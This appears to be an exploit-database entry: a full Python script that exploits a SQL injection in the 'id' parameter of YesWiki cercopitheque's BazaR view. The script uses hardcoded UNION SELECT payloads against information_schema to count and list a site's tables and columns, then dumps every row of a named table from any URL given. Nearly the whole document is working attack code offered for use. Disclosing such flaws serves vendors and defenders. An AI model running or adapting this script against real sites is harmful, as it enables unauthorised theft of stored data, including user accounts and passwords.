YesWiki cercopitheque 2020.04.18.1 - 'id' SQL Injection

2020-05-06
ID: 102940
CVE: None
Download vulnerable application: None
# Exploit Title: 
# Date: 2020-04-25
# Exploit Author: coiffeur
# Vendor Homepage: https://yeswiki.net/
# Software Link: https://yeswiki.net/, https://github.com/YesWiki/yeswiki
# Version: YesWiki cercopitheque < 2020-04-18-1

import sys

import requests

DEBUG = 0


def usage():
    banner = """NAME: YesWiki cercopitheque 2020-04-18-1, SQLi
SYNOPSIS: python sqli_2020.04.18.1.py <URL> [OPTIONS]...
DESCRIPTION:
    -lt, list tables.
    -dt <TABLE>, dump table.
AUTHOR: coiffeur
    """
    print(banner)


def parse(text):
    deli_l = 'ABCAABBCC|'
    deli_r = '|ABCAABBCC'
    if (text.find(deli_l) == -1) or (text.find(deli_r) == -1):
        print('[x] Delimiter not found, please try to switch to a Time Based SQLi')
        exit(-1)
    start = text.find(deli_l) + len(deli_l)
    end = start + text[start::].find(deli_r)
    return text[start:end]


def render(elements):
    print(elements)

def get_count(t_type, table_name=None, column_name=None):
    if t_type == 'table':
        payload = '?BazaR&vue=consulter&id=-9475 UNION ALL SELECT (SELECT concat(0x414243414142424343,0x7c,count(TABLE_NAME),0x7c,0x414243414142424343) FROM information_schema.tables),NULL,NULL,NULL,NULL,NULL-- -'
        if DEBUG > 1:
            print(f'[DEBUG] {payload}')
        r = requests.get(url=f'{sys.argv[1]}{payload}')
        if r.status_code == 200:
            data = parse(r.text)
    if t_type == 'column':
        payload = f'?BazaR&vue=consulter&id=-9475 UNION ALL SELECT (SELECT concat(0x414243414142424343,0x7c,count(COLUMN_NAME),0x7c,0x414243414142424343) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = "{table_name}"),NULL,NULL,NULL,NULL,NULL-- -'
        if DEBUG > 1:
            print(f'[DEBUG] {payload}')
        r = requests.get(url=f'{sys.argv[1]}{payload}')
        data = parse(r.text)
    if t_type == 'element':
        payload = f'?BazaR&vue=consulter&id=-9475 UNION ALL SELECT (SELECT concat(0x414243414142424343,0x7c,count({column_name}),0x7c,0x414243414142424343) FROM {table_name}),NULL,NULL,NULL,NULL,NULL-- -'
        if DEBUG > 1:
            print(f'[DEBUG] {payload}')
        r = requests.get(url=f'{sys.argv[1]}{payload}')
        data = parse(r.text)
    return int(data)


def list_tables():
    tables_count = get_count(t_type='table')
    print(f'[+] Tables found: {tables_count}')

    tables = []
    for i in range(0, tables_count):
        payload = f'?BazaR&vue=consulter&id=-9475 UNION ALL SELECT (SELECT concat(0x414243414142424343,0x7c,TABLE_NAME,0x7c,0x414243414142424343) FROM information_schema.tables LIMIT 1 OFFSET {i}),NULL,NULL,NULL,NULL,NULL-- -'
        if DEBUG > 1:
            print(f'[DEBUG] {payload}')
        r = requests.get(url=f'{sys.argv[1]}{payload}')
        if r.status_code == 200:
            talbe = parse(r.text)
            print(f'\t{talbe}')
            tables.append(talbe)
    return tables


def list_columns(table_name):
    columns_count = get_count(t_type='column', table_name=table_name)
    print(f'[+] Columns found: {columns_count}')

    columns = []
    for i in range(0, columns_count):
        payload = f'?BazaR&vue=consulter&id=-9475 UNION ALL SELECT (SELECT concat(0x414243414142424343,0x7c,COLUMN_NAME,0x7c,0x414243414142424343) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = "{table_name}" LIMIT 1 OFFSET {i}),NULL,NULL,NULL,NULL,NULL-- -'
        if DEBUG > 1:
            print(f'[DEBUG] {payload}')
        r = requests.get(url=f'{sys.argv[1]}{payload}')
        if r.status_code == 200:
            column = parse(r.text)
            if DEBUG > 0:
                print(f'\t{column}')
            columns.append(column)
    return columns


def dump_table(name):
    columns = list_columns(name)
    elements = [None]*len(columns)
    for i in range(0, len(columns)):
        elements_count = get_count(
            t_type='element', table_name=name, column_name=columns[i])
        if DEBUG > 0:
            print(f'[+] Dumping: {columns[i]} ({elements_count} rows)')
        element = []
        for j in range(0, elements_count):
            payload = f'?BazaR&vue=consulter&id=-9475 UNION ALL SELECT (SELECT concat(0x414243414142424343,0x7c,{columns[i]},0x7c,0x414243414142424343) FROM {name} LIMIT 1 OFFSET {j}),NULL,NULL,NULL,NULL,NULL-- -'
            if DEBUG > 1:
                print(f'[DEBUG] {payload}')
            r = requests.get(url=f'{sys.argv[1]}{payload}')
            if r.status_code == 200:
                element.append(parse(r.text))
                if DEBUG > 0:
                    print(f'\t{element[-1]}')
        elements[i] = element
    render(elements)
    return elements


def main():
    if len(sys.argv) < 3:
        print(usage())
        exit(-1)

    if sys.argv[2] == '-lt':
        list_tables()

    if sys.argv[2] == '-dt':
        dump_table(sys.argv[3])


if __name__ == "__main__":
    main()
1-4-2 (www01)